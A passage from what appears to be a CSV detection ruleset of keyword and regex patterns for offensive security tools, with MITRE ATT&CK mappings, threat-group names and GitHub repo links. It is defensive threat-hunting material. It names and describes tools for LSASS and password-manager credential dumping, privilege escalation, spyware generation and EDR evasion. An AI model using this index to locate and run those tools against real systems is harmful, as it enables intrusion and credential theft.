T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\GetWebDAVStatus.exe*",".{0,1000}\\\\GetWebDAVStatus\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\\localhost/pipe/petit\*",".{0,1000}\\\\localhost\/pipe\/petit\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\\pipe\\DAV RPC SERVICE*",".{0,1000}\\\\pipe\\\\DAV\sRPC\sSERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\\pipe\\petit\\pipe\\srvsvc*",".{0,1000}\\\\pipe\\\\petit\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\\PPLmedic\\ntstuff*",".{0,1000}\\\\PPLmedic\\\\ntstuff.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\\saint.jar*",".{0,1000}\\\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\\stub\\COFFLoader.bin*",".{0,1000}\\\\stub\\\\COFFLoader\.bin.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\\swodniW\\:C*",".{0,1000}\\\\swodniW\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\Users\\Fantastic\\Desktop\\DEMO\\plugins\\scripts\\*",".{0,1000}\\\\Users\\\\Fantastic\\\\Desktop\\\\DEMO\\\\plugins\\\\scripts\\\\.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\1$a$$.exe*",".{0,1000}\\1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\1.Encrypt_shellcode*",".{0,1000}\\1\.Encrypt_shellcode.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\10m_usernames.txt*",".{0,1000}\\10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*\127.0.0.1/pipe/coerced*",".{0,1000}\\127\.0\.0\.1\/pipe\/coerced.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*\1password\app\FindsecondPID1password.h*",".{0,1000}\\1password\\app\\FindsecondPID1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getCreds1passwordappEntries1.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getCreds1passwordappEntries2.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getCreds1passwordappMaster.h*",".{0,1000}\\1password\\app\\getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getProcUAC1password.h*",".{0,1000}\\1password\\app\\getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\plugin\getCreds1passwordplugin.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\plugin\getCreds1passwordplugin2.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\2fac5c2a114c7896c33fb2b0a9f6443d\*",".{0,1000}\\2fac5c2a114c7896c33fb2b0a9f6443d\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*",".{0,1000}\\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*\AbandonedCOMKeys.*",".{0,1000}\\AbandonedCOMKeys\..{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\ABPTTS-master*",".{0,1000}\\ABPTTS\-master.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*\accounts_passdontexpire.txt*",".{0,1000}\\accounts_passdontexpire\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\AD_Miner-*",".{0,1000}\\AD_Miner\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*\ADAudit.ps1*",".{0,1000}\\ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ADCollector3.sln*",".{0,1000}\\ADCollector3\.sln.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*\ADCollector3\*",".{0,1000}\\ADCollector3\\.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*\adcs.py*",".{0,1000}\\adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ADCSCoercePotato\*",".{0,1000}\\ADCSCoercePotato\\.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*\ADCSPwn*",".{0,1000}\\ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*\ADCSPwn.exe*",".{0,1000}\\ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\adcsync.py*",".{0,1000}\\adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*\add_computer.py*",".{0,1000}\\add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\addcomputer_LDAP_spn.py*",".{0,1000}\\addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\addcomputer_with_spns.py*",".{0,1000}\\addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\Add-RemoteRegBackdoor.ps1*",".{0,1000}\\Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\ADeleg.exe*",".{0,1000}\\ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*\adeleg.pdb*",".{0,1000}\\adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\adeleg\adeleg\*",".{0,1000}\\adeleg\\adeleg\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\adeleg\winldap\*",".{0,1000}\\adeleg\\winldap\\.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\Adeleginator-main*",".{0,1000}\\Adeleginator\-main.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*\adeleg-main*",".{0,1000}\\adeleg\-main.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*\ADFSDump.*",".{0,1000}\\ADFSDump\..{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*\ADFSDump.exe*",".{0,1000}\\ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ADFSDump\*",".{0,1000}\\ADFSDump\\.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*\ADFSDump-master*",".{0,1000}\\ADFSDump\-master.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*\ADFSpoof.py*",".{0,1000}\\ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*\ADFSpray*",".{0,1000}\\ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*\ADFSRelay\*",".{0,1000}\\ADFSRelay\\.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*\adm2sys.py*",".{0,1000}\\adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*\admin_persistence_winlogon*",".{0,1000}\\admin_persistence_winlogon.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\admin-panels.txt*",".{0,1000}\\admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\ADSearch.exe*",".{0,1000}\\ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 